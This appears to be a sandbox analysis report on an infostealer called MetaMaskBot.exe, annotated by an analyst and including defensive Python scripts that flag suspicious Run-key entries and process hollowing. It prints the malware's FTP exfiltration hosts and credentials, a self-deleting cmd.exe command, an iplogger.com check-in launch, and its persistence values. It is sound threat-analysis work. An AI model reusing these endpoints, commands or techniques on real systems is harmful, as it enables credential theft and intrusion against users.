Analysis
- max time kernel: 148s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 11-01-2023 00:41

Static task: static1
Behavioral task: behavioral1
- Sample: MetaMaskBot.exe
- Resource: win7-20220812-en
General
- Target: MetaMaskBot.exe
- Size: 38KB
- MD5: 9169eb7a644bd28cbba4759b30298176
- SHA1: ffe90ae79fd542268818deccc193c8617845acfb
- SHA256: d97d88d757d722f0c078b4d22a5fac76bcb44db740c8b3ea9181e8733ac3c1ca
- SHA512: cb47f0b6e74bc3c255e05ae1c5722100186be86f78df16bba166d2b1e580fa6d7bb1e22744fcd04d081dcc50a9c3580f8f85e3dca6a060cb11ef0a6e0bcfdfb5
- SSDEEP: 768:h7ra/Tl+hs3E/jU0dugZ0T2Xtz+lHQW40Zz0D3jHUpi1GouIbV:c/T2X/jN2vxZz0DTHUpouIbV
Malware Config
Extracted
- Protocol: ftp
- Host: 188.120.227.9
- Port: 21
- Username: PK1
- Password: PK1
Extracted
- Protocol: ftp
- Host: 79.174.12.59
- Port: 21
- Username: hsngfb
- Password: hsnrgthearsgdt
Both exfiltration endpoints are plain FTP with the credentials embedded in the sample, so the upload, and the credentials themselves, cross the network unencrypted. Outbound tcp/21 to either host is a direct network indicator for this sample.
Signatures
- Executes dropped EXE (1 IoC)
  Processes: pythonw.exe (PID 308)
- Loads dropped DLL (4 IoCs)
  Processes: iexplore.exe (PID 4716), four load events
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Adds Run key to start application (2 TTPs, 4 IoCs)
  Processes: pythonw.exe, msedge.exe
  - Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\com = "C:\Users\Admin\AppData\Roaming\pythonw.exe C:\Users\Admin\AppData\Roaming\1680.py" (pythonw.exe)
  - Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\googl = "C:\Users\Admin\AppData\Roaming\pythonw.exe C:\Users\Admin\AppData\Roaming\1680.py" (pythonw.exe)
  - Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\apdate = "C:\Users\Admin\AppData\Roaming\pythonw.exe C:\Users\Admin\AppData\Roaming\clip.py" (pythonw.exe)
  - Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run (msedge.exe)
  Three HKCU Run values with innocuous-looking names (com, googl, apdate) start the dropped copy of the Python launcher in AppData\Roaming with a script from the same directory (1680.py twice, clip.py once). The msedge.exe entry is only the browser opening the Run key; it sets no value.
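The three Run values above share one shape: an interpreter copied into a per-user directory, started with a script from that same directory. The check below turns that shape into a triage rule. It is an added example written for this page, not part of the sandbox report or of the sample, and it is in Python because that is the sample's own runtime. The Run values and the SHA256 of the dropped Roaming\pythonw.exe are taken from this report; the benign Windows Defender entry, the on-disk hash inventory, the SCRIPT_HOSTS set and the directory pattern are constructed for the demonstration.

```python
"""Triage check for HKCU ...\\CurrentVersion\\Run values.

Flags a value when its image lives in a user-writable directory, when a
script host (pythonw.exe, wscript.exe, ...) is handed a script from such a
directory, and, when an on-disk hash inventory is supplied, when the image's
SHA256 matches a hash taken from a sandbox report.
"""
import ntpath
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Interpreters that run whatever file they are given on the command line.
SCRIPT_HOSTS = {
    "pythonw.exe", "python.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "powershell.exe", "pwsh.exe",
}

# Per-user or world-writable locations a Run value should normally not point into.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\appdata\\(roaming|local\\temp|local)\\"
    r"|\\programdata\\"
    r"|\\windows\\temp\\",
    re.IGNORECASE,
)


@dataclass
class RunKeyFinding:
    name: str
    image: str
    args: List[str]
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def split_command(cmd: str) -> List[str]:
    """Split a Run value into argv, keeping double-quoted paths intact."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmd)]


def classify_run_value(
    name: str,
    cmd: str,
    disk_hashes: Optional[Dict[str, str]] = None,
    report_hashes: Optional[Set[str]] = None,
) -> RunKeyFinding:
    argv = split_command(cmd)
    if not argv:
        return RunKeyFinding(name, "", [], ["empty value"])
    image, args = argv[0], argv[1:]
    finding = RunKeyFinding(name, image, args)

    if USER_WRITABLE.search(image):
        finding.reasons.append("image in user-writable directory")

    if ntpath.basename(image).lower() in SCRIPT_HOSTS:
        scripts = [ntpath.basename(a) for a in args if USER_WRITABLE.search(a)]
        if scripts:
            finding.reasons.append(
                "script host runs " + ", ".join(scripts) + " from user-writable directory"
            )

    if disk_hashes and report_hashes:
        # disk_hashes maps a lower-cased image path to the SHA256 of the file on disk.
        digest = disk_hashes.get(image.lower(), "").lower()
        if digest in report_hashes:
            finding.reasons.append("image SHA256 matches a hash from the sandbox report")

    return finding


def triage_run_key(values, disk_hashes=None, report_hashes=None) -> List[RunKeyFinding]:
    """Return only the suspicious findings, in registry order."""
    findings = (classify_run_value(n, c, disk_hashes, report_hashes) for n, c in values.items())
    return [f for f in findings if f.suspicious]


# Constructed input: the three Run values the report records (real registry
# values carry single backslashes), one benign entry, and an inventory holding
# the SHA256 the report gives for the dropped Roaming\pythonw.exe.
SAMPLE_RUN_VALUES = {
    "com": r"C:\Users\Admin\AppData\Roaming\pythonw.exe C:\Users\Admin\AppData\Roaming\1680.py",
    "googl": r"C:\Users\Admin\AppData\Roaming\pythonw.exe C:\Users\Admin\AppData\Roaming\1680.py",
    "apdate": r"C:\Users\Admin\AppData\Roaming\pythonw.exe C:\Users\Admin\AppData\Roaming\clip.py",
    "SecurityHealth": r'"C:\Program Files\Windows Defender\MSASCuiL.exe"',
}
SAMPLE_DISK_HASHES = {
    r"c:\users\admin\appdata\roaming\pythonw.exe":
        "333aa54b7532b181164520f69a680eaee344c2f483a02239898a64126d26a6d9",
}
REPORT_DROPPED_SHA256 = {"333aa54b7532b181164520f69a680eaee344c2f483a02239898a64126d26a6d9"}

if __name__ == "__main__":
    for f in triage_run_key(SAMPLE_RUN_VALUES, SAMPLE_DISK_HASHES, REPORT_DROPPED_SHA256):
        print(f"[!] Run\\{f.name}: {f.image} {' '.join(f.args)}")
        for reason in f.reasons:
            print("    -", reason)
```

On a live host the dictionary would come from reading the Run key for each loaded user hive and the hash inventory from hashing the referenced images; the directory pattern is deliberately narrow so that an interpreter installed under Program Files running a script from a user directory still fires on the second rule only.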
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Program crash (1 IoC)
  Processes: WerFault.exe (PID 488) for target iexplore.exe (PID 4716)
- Suspicious use of SetThreadContext (3 IoCs)
  Processes: pythonw.exe (PID 4488)
  - PID 4488 set thread context of 4716 (pythonw.exe -> iexplore.exe)
  - PID 4488 set thread context of 308 (pythonw.exe -> pythonw.exe)
  - PID 4488 set thread context of 3300 (pythonw.exe -> iexplore.exe)
  Each target is a child that pythonw.exe (PID 4488) spawned and also wrote to (see "Suspicious use of WriteProcessMemory" below). Writing a fresh child's memory and then resetting its thread context is the process hollowing pattern: the two iexplore.exe instances and the second pythonw.exe are hosts for injected code, not the programs their image names suggest. The WerFault crash of PID 4716 is consistent with one hollowed host failing.
- Drops file in Program Files directory (2 IoCs)
  Processes: setup.exe
  - File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\a1a310da-3131-4b6e-9efe-cf9de555f6fd.tmp (setup.exe)
  - File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230111014453.pma (setup.exe)
  Both files are written by the Edge installer's metrics component, which ran because the sample launched Edge; this is browser housekeeping rather than a drop by the sample.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  This is a generic sandbox heuristic; nothing else in the report points to encryption, and the remaining signatures describe an infostealer.
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: iexplore.exe
  - Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (iexplore.exe)
  - Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (iexplore.exe)
- Delays execution with timeout.exe (1 IoC)
  Processes: timeout.exe (PID 3188)
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: msedge.exe
  - Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
  - Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
  - Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Modifies registry class (1 IoC)
  Processes: msedge.exe
  - Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ (msedge.exe)
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: vlc.exe (PID 5848)
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes: pythonw.exe (PID 308, 2 events), msedge.exe (PID 1636, 2), msedge.exe (PID 3140, 2), iexplore.exe (PID 4716, 2), identity_helper.exe (PID 3428, 2), msedge.exe (PID 4876, 4)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes: vlc.exe (PID 5848)
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
  Processes: msedge.exe (PID 3140, 6 events)
- Suspicious use of AdjustPrivilegeToken (26 IoCs)
  Processes: pythonw.exe, pythonw.exe, iexplore.exe
  - Token: 35 (PID 4488 pythonw.exe)
  - Token: SeDebugPrivilege (PID 308 pythonw.exe)
  - PID 3300 iexplore.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 33, 34, 35, 36
  The injected iexplore.exe (PID 3300) enables every privilege present in its token rather than the one a task needs, a pattern of a generic "enable all privileges" stub. The bare numbers are privilege LUIDs the sandbox left unresolved: 33 SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege, 36 SeDelegateSessionUserImpersonatePrivilege. Enabling a privilege only succeeds if the token already holds it, so in a standard-user session most of these calls fail silently.
- Suspicious use of FindShellTrayWindow (6 IoCs)
  Processes: msedge.exe (PID 3140, 2 events), vlc.exe (PID 5848, 4 events)
- Suspicious use of SendNotifyMessage (3 IoCs)
  Processes: vlc.exe (PID 5848, 3 events)
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes: iexplore.exe (PID 3300), vlc.exe (PID 5848)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: MetaMaskBot.exe, pythonw.exe, msedge.exe
  Source -> target, with repeated writes to the same pair collapsed:
  - PID 4128 MetaMaskBot.exe -> PID 4488 pythonw.exe (3 writes)
  - PID 4488 pythonw.exe -> PID 4716 iexplore.exe (9 writes)
  - PID 4488 pythonw.exe -> PID 308 pythonw.exe (9 writes)
  - PID 4488 pythonw.exe -> PID 3300 iexplore.exe (12 writes)
  - PID 4488 pythonw.exe -> PID 3140 msedge.exe (2 writes)
  - PID 3140 msedge.exe -> PID 3852 msedge.exe (2 writes)
  - PID 3140 msedge.exe -> PID 1736 msedge.exe (all remaining entries; the report lists at most 64)
  The writes from pythonw.exe (PID 4488) into the two iexplore.exe instances and into the second pythonw.exe are the injection half of the hollowing recorded under SetThreadContext. The msedge.exe -> msedge.exe writes are the Edge browser process setting up its own sandboxed children and are expected for a Chromium browser; the MetaMaskBot.exe -> pythonw.exe writes are the dropper handing off to the launcher it spawned.
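The write table above is easier to read once the events are grouped by source/target pair and joined with the SetThreadContext entries, which is how an analyst tells hollowing from a browser broker talking to its own children. The Python below does that over lines written in the report's own IoC wording. It is an added example, not part of the sandbox report; SAMPLE_TRACE is a hand-copied subset of this report's events with the repeated writes collapsed to one or two lines per pair, and the verdict names (hollowing-candidate, cross-image-write, same-image-write) are this example's own.

```python
"""Group WriteProcessMemory / SetThreadContext events by (source, target) pair
and rank the pairs that look like process hollowing.

Input lines follow the wording the sandbox report uses, for example:
  PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe
  PID 4488 set thread context of 4716 4488 pythonw.exe iexplore.exe
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

EVENT_RE = re.compile(
    r"PID\s+(?P<src>\d+)\s+(?P<op>wrote to memory of|set thread context of)\s+(?P<tgt>\d+)"
    r"\s+\d+\s+(?P<src_img>\S+)\s+(?P<tgt_img>\S+)"
)


@dataclass
class PairActivity:
    src_pid: int
    tgt_pid: int
    src_image: str
    tgt_image: str
    writes: int = 0
    thread_context_sets: int = 0

    @property
    def verdict(self) -> str:
        # Memory written and the target's thread context replaced: the
        # classic hollowing sequence regardless of image names.
        if self.writes and self.thread_context_sets:
            return "hollowing-candidate"
        # Writes into a differently named child: launcher hand-off or plain injection.
        if self.writes and self.src_image.lower() != self.tgt_image.lower():
            return "cross-image-write"
        # A process writing to a child of its own image, e.g. a browser broker.
        return "same-image-write"


def parse_events(text: str) -> Dict[Tuple[int, int], PairActivity]:
    pairs: Dict[Tuple[int, int], PairActivity] = {}
    for m in EVENT_RE.finditer(text):
        key = (int(m["src"]), int(m["tgt"]))
        pa = pairs.setdefault(key, PairActivity(key[0], key[1], m["src_img"], m["tgt_img"]))
        if m["op"].startswith("wrote"):
            pa.writes += 1
        else:
            pa.thread_context_sets += 1
    return pairs


def rank(pairs: Dict[Tuple[int, int], PairActivity]) -> List[PairActivity]:
    """Most suspicious first; within a verdict, the pair with more writes first."""
    order = {"hollowing-candidate": 0, "cross-image-write": 1, "same-image-write": 2}
    return sorted(pairs.values(), key=lambda p: (order[p.verdict], -p.writes))


def hollowing_targets(pairs: Dict[Tuple[int, int], PairActivity]) -> List[int]:
    """PIDs whose memory image should be dumped instead of the file on disk."""
    return sorted(p.tgt_pid for p in pairs.values() if p.verdict == "hollowing-candidate")


# Constructed sample: a subset of the events in the report above, with the
# repeated writes to each pair collapsed.
SAMPLE_TRACE = """
PID 4128 wrote to memory of 4488 4128 MetaMaskBot.exe pythonw.exe
PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe
PID 4488 wrote to memory of 4716 4488 pythonw.exe iexplore.exe
PID 4488 set thread context of 4716 4488 pythonw.exe iexplore.exe
PID 4488 wrote to memory of 308 4488 pythonw.exe pythonw.exe
PID 4488 set thread context of 308 4488 pythonw.exe pythonw.exe
PID 4488 wrote to memory of 3300 4488 pythonw.exe iexplore.exe
PID 4488 set thread context of 3300 4488 pythonw.exe iexplore.exe
PID 4488 wrote to memory of 3140 4488 pythonw.exe msedge.exe
PID 3140 wrote to memory of 1736 3140 msedge.exe msedge.exe
"""

if __name__ == "__main__":
    for p in rank(parse_events(SAMPLE_TRACE)):
        print(f"{p.verdict:20} {p.src_pid:>5} {p.src_image:16} -> {p.tgt_pid:>5} {p.tgt_image:14} "
              f"writes={p.writes} ctx={p.thread_context_sets}")
```

The same grouping works on Sysmon event 10 (ProcessAccess) joined with event 1 (ProcessCreate) when the access mask includes PROCESS_VM_WRITE and PROCESS_SET_INFORMATION on a child created moments earlier; the report's wording is just a convenient flat form of that data.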
Processes
- C:\Users\Admin\AppData\Local\Temp\MetaMaskBot.exe
  Command: "C:\Users\Admin\AppData\Local\Temp\MetaMaskBot.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\pythonw.exe (PID 4488)
    Command: "pythonw.exe" "server.dll"
    Python runs whatever file it is given as a script regardless of extension, so server.dll here is Python code (source, bytecode or a zipapp) executed by the interpreter, not a library loaded with LoadLibrary.
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Internet Explorer\iexplore.exe (PID 4716)
      Command: "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
      - Loads dropped DLL (the dropped DLLs listed under Downloads are C:\ProgramData\mozglue.dll and C:\ProgramData\nss3.dll)
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - C:\Windows\SysWOW64\cmd.exe
        Command: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Program Files (x86)\Internet Explorer\iexplore.exe" & exit
        Self-delete routine: the injected code deletes its own image path after a 6 s wait for the parent to exit. Because the code is hollowed into iexplore.exe, the path it deletes is the legitimate Internet Explorer binary, not the dropper or the Python launcher.
        - C:\Windows\SysWOW64\timeout.exe (PID 3188)
          Command: timeout /t 6
          - Delays execution with timeout.exe
      - C:\Windows\SysWOW64\WerFault.exe (PID 488)
        Command: C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 1960
        - Program crash
    - C:\Users\Admin\AppData\Roaming\pythonw.exe (PID 308)
      Command: "C:\Users\Admin\AppData\Roaming\pythonw.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Program Files (x86)\Internet Explorer\iexplore.exe (PID 3300)
      Command: "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3140)
      Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/rsgafs
      iplogger.com is an IP-logging service; opening the link in the victim's default browser records the victim's public IP address and user agent for the operator, a check-in rather than a download. Everything below this process is Edge's normal multi-process startup.
      - Adds Run key to start application
      - Enumerates system info in registry
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7fffcef046f8,0x7fffcef04708,0x7fffcef04718
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5052 /prefetch:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5340 /prefetch:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6284 /prefetch:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6436 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4456 /prefetch:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        - Drops file in Program Files directory
        - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
          Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6cd325460,0x7ff6cd325470,0x7ff6cd325480
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 3428)
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4456 /prefetch:8
        - Suspicious behavior: EnumeratesProcesses
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1904 /prefetch:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 /prefetch:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1888 /prefetch:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,2573959698017093075,11300899179874246748,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7152 /prefetch:2
        - Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\CompPkgSrv.exe
  Command: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\SysWOW64\WerFault.exe
  Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4716 -ip 4716
- C:\Windows\System32\rundll32.exe
  Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Program Files\VideoLAN\VLC\vlc.exe (PID 5848)
  Command: "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\MeasureEnter.avi"
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
